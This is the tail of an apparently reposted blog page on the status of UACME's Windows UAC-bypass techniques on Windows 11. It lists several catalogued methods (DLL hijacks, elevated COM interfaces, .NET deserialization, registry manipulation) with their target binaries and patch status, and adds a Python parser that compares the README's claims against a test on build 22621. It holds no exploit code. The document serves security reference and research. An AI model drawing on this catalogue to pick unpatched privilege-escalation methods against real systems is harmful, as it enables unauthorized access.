* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.9
73. Author: orange_8361 and antonioCoco
* Type: Shell API
* Method: .NET deserialization
* Target(s): \system32\mmc.exe EventVwr.msc
* Component(s): Attacker defined
* Implementation: ucmDotNetSerialMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.0
74. Author: zcgonvh
* Type: Elevated COM interface
* Method: IElevatedFactoryServer
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmVFServerTaskSchedMethod
* Works from: Windows 8.1 (9600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.1
75. Author: zcgonvh derivative by Wh04m1001
* Type: Elevated COM interface
* Method: IDiagnosticProfile
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmVFServerDiagProfileMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.2
76. Author: HackerHouse
* Type: Dll Hijack
* Method: Dll path search abuse, Registry key manipulation
* Target(s): \syswow64\iscsicpl.exe
* Component(s): iscsiexe.dll
* Implementation: ucmIscsiCplMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.3
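Added example in Python, not UACME project code: a parser for the entry format used in the list above. It answers two questions the list alone does not: which entries the README's own "Works from" / "Fixed in" ranges still call working on a given build, and which of those the bare-metal test at the top of this page (build 22621, entries 33 41 43 53 59 61 62 70 73) did not confirm. `SAMPLE` is a constructed subset of four entries copied verbatim from the list; paste the whole list in its place for a full run.

```python
"""Parse UACME catalogue entries and compare README status with a real test.

Added example, not UACME code.  SAMPLE is a constructed subset (entries 2, 22,
33, 56) copied from the list above; TESTED_22621 is the page's own bare-metal
result for build 22621.
"""
import re

SAMPLE = r"""2. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): ShCore.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 8.1 (9600)
* Fixed in: Windows 10 TP (> 9600)
* How: Side effect of ShCore.dll moving to \KnownDlls
* Code status: removed starting from v3.5.0 :tractor:
22. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation, SxS DotLocal
* Target(s): \system32\consent.exe
* Component(s): comctl32.dll
* Implementation: ucmSXSMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.5.0
33. Author: winscripting.blog
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\fodhelper.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.2
56. Author: Hashim Jawad
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\WSReset.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod2
* Works from: Windows 10 (17134)
* Fixed in: Windows 11 (22000)
* How: Windows components redesign
* Code status: removed starting from v3.5.7 :tractor:
"""

TESTED_22621 = {33, 41, 43, 53, 59, 61, 62, 70, 73}   # from note (1) above

ENTRY_RE = re.compile(r"^(\d+)\. Author: (.*)$", re.M)
FIELD_RE = re.compile(r"^\* ([^:]+): (.*)$", re.M)
BUILD_RE = re.compile(r"\((>?)\s*(\d+)\)")


def _build(text):
    """'Windows 8.1 (9600)' -> 9600; 'Windows 10 TP (> 9600)' -> 9601 (first
    build where it no longer works); 'unfixed ...' -> None."""
    m = BUILD_RE.search(text)
    if not m:
        return None
    return int(m.group(2)) + (1 if m.group(1) else 0)


def parse_catalogue(text):
    """Split on 'N. Author:' headers and collect the '* Field: value' lines."""
    entries = {}
    starts = list(ENTRY_RE.finditer(text))
    for i, m in enumerate(starts):
        end = starts[i + 1].start() if i + 1 < len(starts) else len(text)
        fields = {k.strip(): v.strip() for k, v in FIELD_RE.findall(text[m.end():end])}
        entries[int(m.group(1))] = {
            "author": m.group(2).strip(),
            "fields": fields,
            "works_from": _build(fields.get("Works from", "")),
            "fixed_in": _build(fields.get("Fixed in", "")),
            # 'removed starting from ...' means the code is gone from UACME
            "in_code": not fields.get("Code status", "").startswith("removed"),
        }
    return entries


def readme_says_working(entries, build):
    """Entry numbers whose README ranges cover `build`."""
    return sorted(
        n for n, e in entries.items()
        if e["works_from"] is not None and e["works_from"] <= build
        and (e["fixed_in"] is None or build < e["fixed_in"])
    )


def stale_on(entries, build, tested_ok):
    """README says working on `build`, but the page's own test did not confirm it."""
    return [n for n in readme_says_working(entries, build) if n not in tested_ok]


if __name__ == "__main__":
    cat = parse_catalogue(SAMPLE)
    print("README says working on 22621:", readme_says_working(cat, 22621))
    print("not confirmed by the bare-metal test:", stale_on(cat, 22621, TESTED_22621))
```

Running it on the full list at build 22621 makes the page's point concrete: "unfixed" in the README is an upper bound and the bare-metal test is the real filter. The `in_code` flag matters too, since an entry marked removed is no longer shipped in UACME even where the underlying technique was never patched.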
Attachment: UACME project, hfiref0x/UACME (Defeating Windows User Account Control): https://github.com/hfiref0x/UACME
------------------------
Follow my blog: 涟幽516
Please credit the source when reposting: [UACME] Status on Win11, http://t.csdn.cn/lRmFP